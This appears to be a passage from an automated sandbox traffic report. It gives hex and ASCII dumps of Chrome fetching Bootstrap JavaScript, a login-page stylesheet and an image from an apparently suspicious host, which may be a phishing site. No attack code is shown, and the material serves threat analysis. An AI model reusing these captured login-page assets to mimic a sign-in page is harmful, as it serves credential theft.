                                                                  Data Ascii: andler.apply(this,arguments)}},l}(e),Kn=(n="alert",a="."+(o="bs.alert"),c=(r=e).fn[n],u={CLOSE:"close"+a,CLOSED:"closed"+a,CLICK_DATA_API:"click"+a+".data-api"},f="alert",d="fade",g="show",_=function(){function i(t){this._element=t}var t=i.prototype;retur
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 5f 2e 5f 68 61 6e 64 6c 65 44 69 73 6d 69 73 73 28 6e 65 77 20 5f 29 29 2c 72 2e 66 6e 5b 6e 5d 3d 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 72 2e 66 6e 5b 6e 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 5f 2c 72 2e 66 6e 5b 6e 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 66 6e 5b 6e 5d 3d 63 2c 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 5f 29 2c 4d 6e 3d 28 70 3d 22 62 75 74 74 6f 6e 22 2c 79 3d 22 2e 22 2b 28 76 3d 22 62 73 2e 62 75 74 74 6f 6e 22 29 2c 45 3d 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 3d 28 6d 3d 65 29 2e 66 6e 5b 70 5d 2c 54 3d 22 61 63 74 69 76 65 22 2c 62 3d 22 62 74 6e 22 2c 49 3d 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 5e 3d 22 62 75 74 74 6f 6e 22 5d 27
                                                                  Data Ascii: _._handleDismiss(new _)),r.fn[n]=_._jQueryInterface,r.fn[n].Constructor=_,r.fn[n].noConflict=function(){return r.fn[n]=c,_._jQueryInterface},_),Mn=(p="button",y="."+(v="bs.button"),E=".data-api",C=(m=e).fn[p],T="active",b="btn",I='[data-toggle^="button"]'
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 74 29 7b 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 65 3d 74 2e 74 61 72 67 65 74 3b 6d 28 65 29 2e 68 61 73 43 6c 61 73 73 28 62 29 7c 7c 28 65 3d 6d 28 65 29 2e 63 6c 6f 73 65 73 74 28 4e 29 29 2c 6b 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 6d 28 65 29 2c 22 74 6f 67 67 6c 65 22 29 7d 29 2e 6f 6e 28 4f 2e 46 4f 43 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 2c 49 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 6d 28 74 2e 74 61 72 67 65 74 29 2e 63 6c 6f 73 65 73 74 28 4e 29 5b 30 5d 3b 6d 28 65 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 53 2c 2f 5e 66 6f 63 75 73 28 69 6e 29 3f 24 2f 2e 74 65 73 74 28 74 2e 74 79 70 65 29 29 7d 29 2c 6d 2e 66 6e 5b 70 5d 3d 6b 2e 5f 6a 51 75 65 72 79 49
                                                                  Data Ascii: t){t.preventDefault();var e=t.target;m(e).hasClass(b)||(e=m(e).closest(N)),k._jQueryInterface.call(m(e),"toggle")}).on(O.FOCUS_BLUR_DATA_API,I,function(t){var e=m(t.target).closest(N)[0];m(e).toggleClass(S,/^focus(in)?$/.test(t.type))}),m.fn[p]=k._jQueryI
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6e 74 29 2c 74 68 69 73 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 7d 76 61 72 20 74 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 6e 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 7c 7c 74 68 69 73 2e 5f 73 6c 69 64 65 28 71 29 7d 2c 74 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 21 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 26 26 22 68 69 64 64 65 6e 22 21 3d 3d 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 73 73 28 22 76 69 73 69 62 69 6c 69 74
                                                                  Data Ascii: his._element.querySelector(nt),this._addEventListeners()}var t=o.prototype;return t.next=function(){this._isSliding||this._slide(q)},t.nextWhenVisible=function(){!document.hidden&&P(this._element).is(":visible")&&"hidden"!==P(this._element).css("visibilit
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 6c 28 7b 7d 2c 57 2c 74 29 2c 46 6e 2e 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 28 6a 2c 74 2c 55 29 2c 74 7d 2c 74 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6b 65 79 62 6f 61 72 64 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4b 45 59 44 4f 57 4e 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 5f 6b 65 79 64 6f 77 6e 28 74 29 7d 29 2c 22 68 6f 76 65 72 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 70 61 75 73 65 26 26 28 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4d 4f 55 53 45 45 4e 54 45 52
                                                                  Data Ascii: =function(t){return t=l({},W,t),Fn.typeCheckConfig(j,t,U),t},t._addEventListeners=function(){var e=this;this._config.keyboard&&P(this._element).on(Q.KEYDOWN,function(t){return e._keydown(t)}),"hover"===this._config.pause&&(P(this._element).on(Q.MOUSEENTER
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 29 7b 76 61 72 20 65 3d 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 24 29 29 3b 50 28 65 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 56 29 3b 76 61 72 20 6e 3d 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 63 68 69 6c 64 72 65 6e 5b 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 29 5d 3b 6e 26 26 50 28 6e 29 2e 61 64 64 43 6c 61 73 73 28 56 29 7d 7d 2c 74 2e 5f 73 6c 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 69 2c 72 2c 6f 3d 74 68 69 73 2c
                                                                  Data Ascii: ement=function(t){if(this._indicatorsElement){var e=[].slice.call(this._indicatorsElement.querySelectorAll($));P(e).removeClass(V);var n=this._indicatorsElement.children[this._getItemIndex(t)];n&&P(n).addClass(V)}},t._slide=function(t,e){var n,i,r,o=this,
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 74 2e 74 6f 28 69 29 3b 65 6c 73 65 20 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 74 5b 6e 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 6e 2b 27 22 27 29 3b 74 5b 6e 5d 28 29 7d 65 6c 73 65 20 65 2e 69 6e 74 65 72 76 61 6c 26 26 28 74 2e 70 61 75 73 65 28 29 2c 74 2e 63 79 63 6c 65 28 29 29 7d 29 7d 2c 6f 2e 5f 64 61 74 61 41 70 69 43 6c 69 63 6b 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 68 69 73 29 3b 69 66 28 65 29 7b 76 61 72 20 6e 3d 50 28 65 29 5b 30 5d 3b 69 66
                                                                  Data Ascii: t.to(i);else if("string"==typeof n){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}else e.interval&&(t.pause(),t.cycle())})},o._dataApiClickHandler=function(t){var e=Fn.getSelectorFromElement(this);if(e){var n=P(e)[0];if


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  47192.168.2.458502188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:34 UTC1364OUTGET /vfd23ced/assets/loginPage18.css HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: text/css,*/*;q=0.1
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: style
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:39 UTC876INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:38 GMT
                                                                  Content-Type: text/css
                                                                  Content-Length: 4030
                                                                  Connection: close
                                                                  Last-Modified: Fri, 06 Dec 2024 11:08:25 GMT
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: REVALIDATED
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mH26IErtBWv8z0rxLG7GJrw8Oo2YYB3T7KDeReRmR1BnTYbxk3Kh7ytZg5zQjg6y9PGYfTkq%2BADRuOhUijICfyjMRJh%2Bn6v0WgE5UAhC4K9mbmJGADtYPZzUbjMRNCI3joVPLvF6Gw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa533528d2f6a50-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1604&rtt_var=802&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4208&recv_bytes=1942&delivery_rate=342441&cwnd=234&unsent_bytes=0&cid=7e0d072247f91006&ts=4084&x=0"
                                                                  2024-12-30 21:42:39 UTC493INData Raw: 2f 2a 20 43 6f 64 65 20 74 69 64 69 65 64 20 75 70 20 62 79 20 53 63 72 61 70 42 6f 6f 6b 20 2a 2f 0a 62 6f 64 79 20 7b 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 20 7d 0a 2e 66 75 6c 6c 50 61 67 65 42 61 63 6b 67 72 6f 75 6e 64 20 7b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 20 7d 0a 23 6c 6f 67 69 6e 50 61 67 65 31 38 2e 6c 6f 67 69 6e 2d 74 61 62 20 7b 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 20 74 6f 70 3a 20 32 35 76 68 3b 20
                                                                  Data Ascii: /* Code tidied up by ScrapBook */body { margin: 0px; }.fullPageBackground { position: relative; background-position: center center; background-repeat: no-repeat; background-size: cover; height: 100vh; }#loginPage18.login-tab { margin: auto; top: 25vh;
                                                                  2024-12-30 21:42:39 UTC1369INData Raw: 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 35 70 78 3b 20 68 65 69 67 68 74 3a 20 63 61 6c 63 28 31 30 30 25 20 2d 20 31 33 30 70 78 29 3b 20 7d 0a 23 6c 6f 67 69 6e 50 61 67 65 31 38 20 2e 6c 6f 67 69 6e 2d 74 61 62 5f 5f 6c 6f 67 6f 20 7b 20 6d 61 78 2d 77 69 64 74 68 3a 20 32 34 30 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 39 30 70 78 3b 20 7d 0a 23 6c 6f 67 69 6e 50 61 67 65 31 38 20 2e 6c 6f 67 69 6e 2d 74 61 62 5f 5f 6c 6f 67 6f 2d 2d 64 65 66 61 75 6c 74 2d 6c 6f 67 6f 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 6e 74 61 69 6e 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 20 7d 0a 23 6c 6f 67 69 6e 50 61 67 65 31 38 20 2e 6c
                                                                  Data Ascii: padding-bottom: 65px; height: calc(100% - 130px); }#loginPage18 .login-tab__logo { max-width: 240px; max-height: 90px; }#loginPage18 .login-tab__logo--default-logo { background-size: contain; background-repeat: no-repeat; margin: auto; }#loginPage18 .l
                                                                  2024-12-30 21:42:39 UTC1369INData Raw: 62 75 74 74 6f 6e 20 2e 6e 65 77 42 75 74 74 6f 6e 54 65 78 74 49 6e 6e 65 72 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 74 3b 20 7d 0a 23 6c 6f 67 69 6e 50 61 67 65 31 38 20 2e 6c 6f 67 69 6e 2d 66 6f 72 6d 2d 76 69 65 77 5f 5f 72 65 67 69 73 74 65 72 2d 6c 69 6e 6b 20 7b 20 6d 61 72 67 69 6e 3a 20 31 34 70 78 20 61 75 74 6f 20 30 70 78 3b 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 20 7d 0a 23 6c 6f 67 69 6e 50 61 67 65 31 38 20 2e 6c 6f 67 69 6e 2d 74 61 62 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 69 63 6f 6e 20 7b 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 20 6c 65 66 74 3a 20 30 70 78 3b 20 74 6f 70 3a 20 30 70 78 3b 20
                                                                  Data Ascii: button .newButtonTextInner { font-size: 11pt; }#loginPage18 .login-form-view__register-link { margin: 14px auto 0px; display: block; font-size: 10pt; }#loginPage18 .login-tab__information-icon { position: absolute; cursor: pointer; left: 0px; top: 0px;
                                                                  2024-12-30 21:42:39 UTC799INData Raw: 62 28 32 30 34 2c 20 32 30 34 2c 20 32 30 34 29 3b 20 7d 0a 2e 72 65 6d 69 6e 64 2d 66 6f 72 6d 2d 76 69 65 77 5f 5f 73 75 62 6d 69 74 2d 62 75 74 74 6f 6e 20 7b 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 6d 61 72 67 69 6e 3a 20 31 35 70 78 20 61 75 74 6f 20 30 70 78 3b 20 7d 0a 2e 72 65 6d 69 6e 64 2d 66 6f 72 6d 2d 76 69 65 77 5f 5f 62 61 63 6b 2d 62 75 74 74 6f 6e 20 7b 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 6d 61 72 67 69 6e 3a 20 31 35 70 78 20 61 75 74 6f 20 30 70 78 3b 20 7d 0a 2e 6c 6f 67 69 6e 2d 66 6f 72 6d 2d 76 69 65 77 5f 5f 70 61 73 73 77 6f 72 64 2d 70 61 6e 65 6c 20 7b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 6d 61 72 67 69 6e 3a 20 31 35 70 78 20 30 70 78 20 30 70 78 3b 20 7d 0a 2e 6c 6f 67 69 6e
                                                                  Data Ascii: b(204, 204, 204); }.remind-form-view__submit-button { display: block; margin: 15px auto 0px; }.remind-form-view__back-button { display: block; margin: 15px auto 0px; }.login-form-view__password-panel { position: relative; margin: 15px 0px 0px; }.login


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  48192.168.2.458507188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:35 UTC1404OUTGET /vfd23ced/assets/image.png HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:39 UTC880INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:38 GMT
                                                                  Content-Type: image/png
                                                                  Content-Length: 8875
                                                                  Connection: close
                                                                  Last-Modified: Fri, 06 Dec 2024 11:08:25 GMT
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: REVALIDATED
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zc3qaGv4bO15QimBvApvBfiv%2B%2BWIySas2rdkn6Gui0stbwPrnXXerY0MKEKEfDHKsdRSniEpFRawC5jqLrRSlztZLdVkagtTJBfjyKIAD4lrCRXW%2FjHrD3iPhitGOLB2KK5miB9tPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa533592ce87ca0-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2037&min_rtt=2030&rtt_var=777&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1982&delivery_rate=1395126&cwnd=174&unsent_bytes=0&cid=012848c50ff3db5e&ts=3218&x=0"
                                                                  2024-12-30 21:42:39 UTC489INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 40 00 00 00 47 08 06 00 00 00 76 e2 9e a6 00 00 00 04 67 41 4d 41 00 00 b1 8e 7c fb 51 93 00 00 00 20 63 48 52 4d 00 00 87 0f 00 00 8c 0f 00 00 fd 52 00 00 81 40 00 00 7d 79 00 00 e9 8b 00 00 3c e5 00 00 19 cc 73 3c 85 77 00 00 0a 39 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 48 c7 9d 96 77 54 54 d7 16 87 cf bd 77 7a a1 cd 30 d2 19 7a 93 2e 30 80 f4 2e 20 1d 04 51 18 66 06 18 ca 00 c3 0c 4d 6c 88 a8 40 44 11 11 01 45 90 a0 80 01 a3 a1 48 ac 88 62 21 28 a8 60 0f 48 10 50 62 30 8a a8 a8 64 46 d6 4a 7c 79 79 ef e5 e5 f7 c7 bd df da 67 ef 73 f7 d9 7b 9f b5 2e 00 24 4f 1f 2e 2f 05 96 02 20 99 27 e0 07 7a 38 d3 57 85 47 d0 b1 fd 00 06 78 80 01 a6 00 30 59 e9 a9 be 41
                                                                  Data Ascii: PNGIHDR@GvgAMA|Q cHRMR@}y<s<w9iCCPPhotoshop ICC profileHwTTwz0z.0. QfMl@DEHb!(`HPb0dFJ|yygs{.$O./ 'z8WGx0YA
                                                                  2024-12-30 21:42:39 UTC1369INData Raw: ed af fc 52 ea 00 60 cc 8a 6a b3 eb 0f 5b cc 7e 00 3a b6 02 20 77 ff 0f 9b e6 21 00 24 45 7d 6b bf f1 c5 79 68 e2 79 89 17 08 52 6d 8c 8d 33 33 33 8d b8 1c 96 91 b8 a0 bf eb 7f 3a fc 0d 7d f1 3d 23 f1 76 bf 97 87 ee ca 89 65 0a 93 04 74 71 dd 58 29 49 29 42 3e 3d 3d 95 c9 e2 d0 0d ff 3c c4 ff 38 f0 af f3 58 1a c8 89 e5 f0 39 3c 51 44 a8 68 ca b8 bc 38 51 bb 79 6c ae 80 9b c2 a3 73 79 ff a9 89 ff 30 ec 4f 5a 9c 6b 91 28 f5 9f 00 35 ca 08 48 dd a0 02 e4 e7 3e 80 a2 10 01 12 79 50 dc f5 df fb e6 83 0f 05 e2 9b 17 a6 3a b1 38 f7 9f 05 fd fb ae 70 89 f8 91 ce 8d fb 1c e7 12 18 4c 67 09 f9 19 8b 6b e2 6b 09 d0 80 00 24 01 15 c8 03 15 a0 01 74 81 21 30 03 56 c0 16 38 02 37 b0 02 f8 81 60 10 0e d6 02 16 88 07 c9 80 0f 32 41 2e d8 0c 0a 40 11 d8 05 f6 82 4a 50 03
                                                                  Data Ascii: R`j[~: w!$E}kyhyRm333:}=#vetqX)I)B>==<8X9<QDh8Qylsy0OZk(5H>yP:8pLgkk$t!0V87`2A.@JP
                                                                  2024-12-30 21:42:39 UTC1369INData Raw: 4f f3 ff 3e 00 13 e0 1f 50 15 f0 34 d0 34 30 37 b0 37 88 12 14 15 d4 14 f4 26 d8 39 b8 24 f8 41 88 6e 88 30 a4 3b 54 32 34 32 b4 31 74 2e cc 35 ac 34 6c 64 95 f1 aa f5 ab ae 87 2b 84 73 c3 3b 23 b0 11 a1 11 0d 11 b3 ab dd 56 ef 5d 3d 1e 69 11 59 10 39 b4 46 67 4d d6 9a ab 6b 15 d6 26 ad 3d 13 25 19 c5 8c 3a 19 8d 8e 0e 8b 6e 8a fe c0 f4 63 d6 31 67 63 bc 62 aa 63 66 58 2e ac 7d ac e7 6c 47 76 19 7b 8a 63 c7 29 e5 4c c4 da c5 96 c6 4e c6 d9 c5 ed 89 9b 8a 77 88 2f 8f 9f e6 ba 70 2b b9 2f 13 3c 13 6a 12 e6 12 fd 12 8f 24 2e 24 85 25 b5 26 e3 92 a3 93 4f f1 64 78 89 bc 9e 14 95 94 ac 94 81 54 83 d4 82 d4 91 34 9b b4 bd 69 33 7c 6f 7e 43 3a 94 be 26 bd 53 40 15 fd 4c f5 09 75 85 5b 85 a3 19 f6 19 55 19 6f 33 43 33 4f 66 49 67 f1 b2 fa b2 f5 b3 77 64 4f e4 b8
                                                                  Data Ascii: O>P44077&9$An0;T2421t.54ld+s;#V]=iY9FgMk&=%:nc1gcbcfX.}lGv{c)LNw/p+/<j$.$%&OdxT4i3|o~C:&S@Lu[Uo3C3OfIgwdO
                                                                  2024-12-30 21:42:39 UTC1369INData Raw: 27 10 94 e7 29 25 2f 04 2d c0 96 a5 8d 48 0c 06 8c 39 cb ea e7 82 0f 0e 60 ee 87 39 18 fd 6c c8 f5 c3 b2 49 ca b1 63 45 3c fd de 30 12 ec d4 9a df 75 22 40 12 2e 58 96 e5 82 8a 26 40 29 d3 6c e0 cf cb 1a e1 0e 3b 70 4c 2f 6d 4a 01 e4 1c 57 17 27 6f d1 4f 8a 42 89 d4 a4 d0 f2 99 41 34 5d cb a9 fd 04 1b e5 79 14 c3 e2 a5 4b f4 be 37 b5 c7 11 0a b8 70 4c 78 df bc c9 d1 44 00 4b 37 f4 a0 f6 5c ba 2b 03 6c 9b ea de 24 98 f9 c0 c1 f7 d6 a0 fb e1 2a 04 c3 6a 28 3e 52 f4 c4 ab 57 27 b0 e4 17 7d c0 d1 4c 63 2e b4 02 bb ce ab c7 f0 9e 20 02 26 75 38 23 cb f6 0d dd 88 9d 4b 05 2a 44 96 e5 86 0c 01 56 9a df 97 c6 5c 2a f5 7b 6a 91 1c e6 8c ee 47 f2 13 a8 b0 0e 47 57 86 13 e4 15 0a b9 48 0d 3a 38 70 63 2d b6 b6 37 62 ec 59 7e a1 81 df 2b 86 cd 93 54 76 5c 54 ef 79 de
                                                                  Data Ascii: ')%/-H9`9lIcE<0u"@.X&@)l;pL/mJW'oOBA4]yK7pLxDK7\+l$*j(>RW'}Lc. &u8#K*DV\*{jGGWH:8pc-7bY~+Tv\Ty
